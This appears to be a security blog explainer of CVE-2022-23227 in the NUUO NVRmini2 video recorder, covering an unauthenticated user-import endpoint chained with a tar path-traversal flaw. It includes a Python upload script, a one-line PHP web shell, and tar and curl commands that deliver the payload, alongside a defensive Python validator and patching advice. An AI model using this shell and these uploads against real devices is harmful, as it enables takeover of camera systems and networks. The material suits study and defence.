CVE-2022-23227 is a critical vulnerability in the NUUO NVRmini2 network video recorder. This flaw allows an attacker, without logging in, to upload specially-crafted files and gain unauthorized access or execute code as root. The issue lies in the device's handle_import_user.php script, which does not authenticate requests, and, when paired with another old vulnerability (CVE-2011-5325), can be used for full system compromise. In this article, we’ll break down what’s going on, how it works, show code snippets, and explain how attackers can exploit these bugs.

Background

NUUO NVRmini2 is a network video recorder used in many security camera setups for businesses and occasionally by consumers. Keeping such devices secure is essential because they are often found on sensitive networks, sometimes exposed to the public internet.

Reference:

- CVE-2022-23227 at NIST NVD
- Vendor Advisory

The Initial Bug: handle_import_user.php Lacks Authentication

handle_import_user.php lets admins upload user data as a tar archive—handy for big organizations. Unfortunately, it doesn’t check who is making the upload. This lets anyone upload a fake (but properly formatted) tar file to the device:

- It expects an encrypted tar containing user configuration.
- No verification is done before importing the users, so arbitrary user accounts can be created surreptitiously.

Code Workflow (Simplified)

// handle_import_user.php (simplified pseudo code)
if ($_FILES['file']['tmp_name']) {
    // No auth check!
    $archive = file_get_contents($_FILES['file']['tmp_name']);
    // Decrypt + untar
    extract_tar_and_apply_users($archive); // This adds users from the archive!
    echo "success";
}

Attack Scenario: Adding Unauthorized Users

An attacker can craft and encrypt a tar archive that includes a legitimate-looking user (e.g., admin or other privileged account) and POST it to the handle_import_user.php endpoint. This results in an arbitrary user being added, often with admin privileges.

Below is a simple example of uploading a user file to the target endpoint:

import requests

url = 'http://target-ip/cgi-bin/handle_import_user.php'

# The endpoint performs no authentication, so no session or credentials are sent
with open('malicious_user.tar', 'rb') as fh:
    files = {
        'file': ('malicious_user.tar', fh, 'application/x-tar')
    }
    response = requests.post(url, files=files)

print(response.text)  # Should display 'success'

*Note: For a real attack, you must properly encrypt the tarball as the device expects.*

Chaining with CVE-2011-5325: Arbitrary File Overwrite

CVE-2011-5325 is an older flaw that lets an attacker overwrite arbitrary files under the web root during tar extraction. When combined with the first bug, an attacker can upload a tar archive containing a malicious PHP file (like a web shell), overwriting an existing file or placing a new one in the web root.
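The two checks the import handler lacks, written out as an added Python reference (not the device's PHP, and not code from the advisory): an admin-session gate in front of the import, and validation of every tar member so that a `..` path cannot land a file outside the staging directory. The web-root and staging paths, and the tar contents, are constructed for illustration.

```python
import io
import posixpath
import tarfile

# Assumed staging directory the import should extract into (not the device's real layout).
IMPORT_DIR = "/tmp/user_import"


def build_sample_tar(entries):
    """Build an in-memory tar from {member_name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def is_authenticated(session):
    """Gate the import on an admin session; handle_import_user.php performs no such check."""
    return bool(session.get("logged_in")) and session.get("role") == "admin"


def unsafe_members(archive_bytes, dest=IMPORT_DIR):
    """Return member names that would escape `dest` or are not regular files.

    This is the CVE-2011-5325 class of defect: a member named '../../www/shell.php'
    resolves outside the staging directory, so extraction overwrites a file under
    the web root. Symlinks and device nodes are rejected for the same reason.
    """
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        for member in tar.getmembers():
            target = posixpath.normpath(posixpath.join(dest, member.name))
            inside = target == dest or target.startswith(dest + "/")
            if not inside or not member.isfile():
                bad.append(member.name)
    return bad


def handle_import(session, archive_bytes):
    """Decision the handler should make: 401 without auth, 400 on a bad archive, else 200."""
    if not is_authenticated(session):
        return 401
    if unsafe_members(archive_bytes):
        return 400
    return 200  # only now would decrypt/extract/apply run, inside IMPORT_DIR
```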

Example Malicious PHP File

<?php system($_GET['cmd']); ?>

Example Tar Command to Create Archive

tar -cf malicious.tar -C /path/to/your/shell . # Add your PHP file
# Encryption would need to match the device's expected format

The same upload, using curl:

curl -F "file=@malicious.tar" http://target-ip/cgi-bin/handle_import_user.php

- Arbitrary User Creation: Complete admin access without authentication.
- Remote Code Execution: Via file overwrite, resulting in total device compromise, including access to camera feeds and potentially the broader network.

If you use NUUO NVRmini2

- Update to the latest firmware immediately (latest available here).

References & Further Reading

- NIST NVD Entry for CVE-2022-23227
- CVE-2011-5325
- Vendor Security Advisory
- Exploit Details at SSD-Disclosure

Conclusion

CVE-2022-23227, especially when combined with CVE-2011-5325, is a critical vulnerability that lets just about anyone take over a NUUO NVRmini2 device remotely. The exploit is disturbingly simple and could be automated. Any affected device should be patched or isolated right away. Always make sure your IoT equipment—even a “simple” security recorder—is locked down and up to date.

Timeline

Published on: 01/14/2022 18:15:00 UTC
Last modified on: 01/21/2022 18:51:00 UTC